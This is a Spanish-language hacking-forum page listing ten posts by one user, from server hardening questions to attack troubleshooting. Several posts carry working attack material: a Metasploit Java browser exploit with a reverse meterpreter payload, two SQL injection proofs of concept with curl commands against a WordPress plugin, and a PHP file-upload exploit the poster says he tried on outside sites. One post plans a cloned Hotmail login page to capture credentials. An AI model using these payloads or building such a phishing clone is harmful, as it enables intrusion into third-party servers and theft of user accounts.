elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Temas
Páginas: [1] 2
1  Comunicaciones / Mensajería / Monitorizar IRC desde el cliente en: 24 Febrero 2014, 11:17 am
Hola a todos,

Estoy realizando un trabajo sobre IRC y me gustaría obtener información sobre los programas o tecnicas para un canal pero desde el lado del cliente. Guardar conversaciones publicas, conexiones y desconexiones de usuarios... etc.

¿Sabeis si existe algo al respecto? Gracias por adelantado,

Saludos!
2  Sistemas Operativos / GNU/Linux / Actualizar CentOS PHP 5.3 en: 11 Julio 2013, 13:30 pm
Hola a todos!!

Estoy intentando fortalecer un servidor Apache Tomcat version: 2.2.15 corriendo en un Centos 6.4. Para hacer unas pruebas iniciales le he tirado OpenVAS y a parte de otras alertas me ha dicho que la version de PHP es 5.3< 5.3.6 y que debe ser actualizada.

Me han comentado que aunque pase esto, puede ser que la version 5.3 para CentOS 6.4 ya este parcheada sin necesidad de actualizarla a una superior. Puede ser esto? Me parece un poco raro pero no se...

Gracias a todos, espero vuestras respuestas ;)
3  Seguridad Informática / Bugs y Exploits / Metasploit out of LAN en: 10 Junio 2013, 20:57 pm
Buenas a todos:

He visto temas parecidos por el foro pero en ninguno se llega a ninguna conclusión sobre el problema.

He montado en casa un laboratorio para testear Metasploit fuera de LAN compuesto por dos ordenadores conectados a 2 routers diferentes de IP pública diferente.

MAQUINA1

PC corriendo Máquina Virtual Kali Linux
IP privada 192.168.1.16
IP publica 88.88.88.88 (inventada por motivos de seguridad)
El router tiene los puertos (80,445 y 4444) fordwardeados a la IP 192.168.1.16

MAQUINA2

Laptot corriendo Máquina Virtual Windows XP SP2 (Java 7 update 6)
El router se supone que no es necesario que tenga ningún puerto abierto puesto que cuando se ejecuta el exploit entra en juego NATP


*******************************************************

En la MAQUINA1

use exploit/multi/browser/java_jre17_reflection_types
set SRVHOST 192.168.1.16
set SRVPORT 80
set URIPATH /ataque

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 88.88.88.88

exploit


En la MAQUINA2

Entro en la URL a través del navegador en la URL 88.88.88.88/ataque

Saltan las alertas de ejecutar un applet de java etc... ACEPTO TODO y parece que se empieza a ejecutar el Applet pero salta una alerta que dice "No se pudo ejecutar el programa".

Metasploit se queda a la espera de un sesión pero no sucede nada... Sinceramente no se que ocurre. He probado el mismo ataque en local y no hay problemas. ¿Alguna idea?

Gracias por adelantado, Saludos ;)


4  Seguridad Informática / Nivel Web / Dos exploits para WordPress Bannerize Plugin en: 23 Enero 2013, 20:11 pm
Hola a todos,

Tengo un par de exploits a nivel web que no se como se tiran. Son de tipo SQL injection pero creo que no se pueden utilizar en la URL, ¿donde debería utilizarlos?. Os dejo los links de exploit-db y el fuente. Gracias por la ayuda ;)

http://www.exploit-db.com/exploits/17906/

Código:

# Exploit Title: WordPress WP Bannerize plugin <= 2.8.7 SQL Injection Vulnerability
# Date: 2011-09-22
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-bannerize.zip
# Version: 2.8.7 (tested)
 
---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php
 limit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
 
e.g.
curl --data "limit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php
 
---------------
Vulnerable code
---------------
if ( @isset($_SERVER['HTTP_X_REQUESTED_WITH']) ) {
    ...
    $limit = intval($_POST['limit']);
    $page_offset = (intval($_POST['offset']) - 1) * $limit;
 
    foreach($_POST["item"] as $key => $value){
        $sql = sprintf("UPDATE `%s` SET `sorter` = %s WHERE id = %s", $wpdb->prefix ."bannerize_b", (intval($key)+$page_offset ), $value );
        $result = mysql_query($sql);
    }
}


http://www.exploit-db.com/exploits/17764/

Código:
# Exploit Title: WordPress WP Bannerize plugin <= 2.8.6 SQL Injection Vulnerability
# Date: 2011-08-31
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-bannerize.zip
# Version: 2.8.6 (tested)
 
---
PoC
---
curl --data "id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)-- " -H "X-Requested-With:XMLHttpRequest" http://www.site.com/wp-content/plugins/wp-bannerize/ajax_clickcounter.php
 
---------------
Vulnerable code
---------------
if ( @isset($_SERVER['HTTP_X_REQUESTED_WITH']) ) {
    ...
    $sql = "UPDATE `" . $wpdb->prefix ."bannerize_b` SET `clickcount` = `clickcount`+1 WHERE id = " . $_POST['id'];
    $result = mysql_query($sql);


5  Seguridad Informática / Hacking Wireless / Redes abiertas con panel de autenticación en: 9 Enero 2013, 12:31 pm
Buenas a todos,

Me gustaría saber si existe información sobre redes abiertas en las que se requiere un usuario y contraseña que deben ser ingresados en el navegador para poder acceder a ellas (Universidades, Internet de pago en sitios públicos...) "este usuario y contraseña es único para cada usuario". ¿Que tipo de arquitectura utilizan? ¿Requieren un software especifico? ¿Son igual de peligrosas que una red pública normal? Toda información al respecto será bienvenida ya que he buscado en internet pero no he conseguido encontrar nada claro. (No importa si está en inglés)

Muchisimas gracias. Saludos!

6  Seguridad Informática / Nivel Web / Exploit PHP para wordpress en: 11 Noviembre 2012, 15:13 pm
Muy buenas, estoy intentando utilizar este exploit en PHP.
http://www.exploit-db.com/exploits/18990/

Lo he hecho de la siguiente forma:

He creado un archivo de nombre "exploit.php" al que le añadido este código y lo he subido a un servidor web.
Código:
<?php

$uploadfile="lo.php";
$ch =
curl_init("http://www.exemple.com/wordpress/wp-content/plugins/html5avmanager/lib/uploadify/custom.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Mi pregunta es:
Se supone que lo.php será el nombre del archivo que quiero subir al servidor. Para que el exploit lo encuentre lo he situado en la misma carpeta que está alojado el exploit.

¿Estoy haciendolo correctamente? He realizado varias pruebas en webs que deberían ser vulnerables pero no lo he conseguido.

Muchas gracias por adelantado. Saludos!!
7  Seguridad Informática / Nivel Web / Metodo PUT en servidor web en: 9 Noviembre 2012, 12:42 pm
Muy buenas!

Mi duda es sencilla pero creo que no tengo los conocimientos suficientes para entender lo que está ocurriendo.

Realizo una petición OPTIONS a un servidor y obtengo como respuesta:

Código:
Allow: GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS


Posteriormente intento utilizar el metodo PUT y obtengo el siguiente mensaje:

Código:
HTTP/1.1 403 Prohibido
Date: Fri, 09 Nov 2012 11:38:12 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 973
Connection: close
Content-Type: text/html;charset=utf-8

<html><head><title>Apache Tomcat/5.0.30 - Informe de Error</title><style>

</style> </head><body><h1>Estado HTTP 403 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Informe de estado</p><p><b>mensaje</b> <u></u></p><p><b>descripción</b> <u>El acceso al recurso especificado () ha sido prohibido.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.0.30</h3></body></html>[/move]

Alguien sabe a que se debe esto?

Muchas gracias por antelación. Saludos ;)
8  Seguridad Informática / Seguridad / Archivos DFL en: 30 Julio 2012, 03:55 am
Alguien sabe exactamente que archivos son los .DFL Signature Default Program Settings y como pueden abrirse en windows?

Tengo entendido que sor archivos de error generados por programas cuando este falla pero no estoy muy seguro de ellos...

Saludos!
9  Seguridad Informática / Hacking / Abriendo archivos DS_store en: 23 Julio 2012, 13:40 pm
Muy buenas! En la actualidad es posible encontrar en multiples paginas una vulnerabilidad que nos permite visualizar el arbol de directorios de una web al generarse los archivos ocultos .DS_store.

Alguien sabe como se pueden visualizar estos archivos en windows? por lo que he leido deben modificarse de UTF-16 a UTF-8 pero no tengo ni idea de hacerlo...


Saludos!! ;)
10  Seguridad Informática / Hacking / Clonar WEBs en: 19 Julio 2012, 11:20 am
Buenas!!

He estado jugando con SET pero todas las opciones de clonar webs son con el fin de obtener el control de la maquina atacada. Mi pregunta es, ¿existe alguna forma de clonar una web con SET u otro programa pero para otros fines?

Se me ocurre por ejemplo alojar un clon de hotmail en mi servidor y que el usuario phiseado ingrese los datos de login.Estos datos sean obtenidos y redireccionarle a la web original de hotmail.

Evidentemente la obtencion y la redireccion de los datos sería programado por mi solo me interesaría el aspecto gráfico.

No quiero que penseis que soy un lamer que le quiere robar el password a su novia, he puesto hotmail por poner un ejemplo ya que esto tiene muchas aplicaciones y me consta que se utiliza.

Saludos!
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines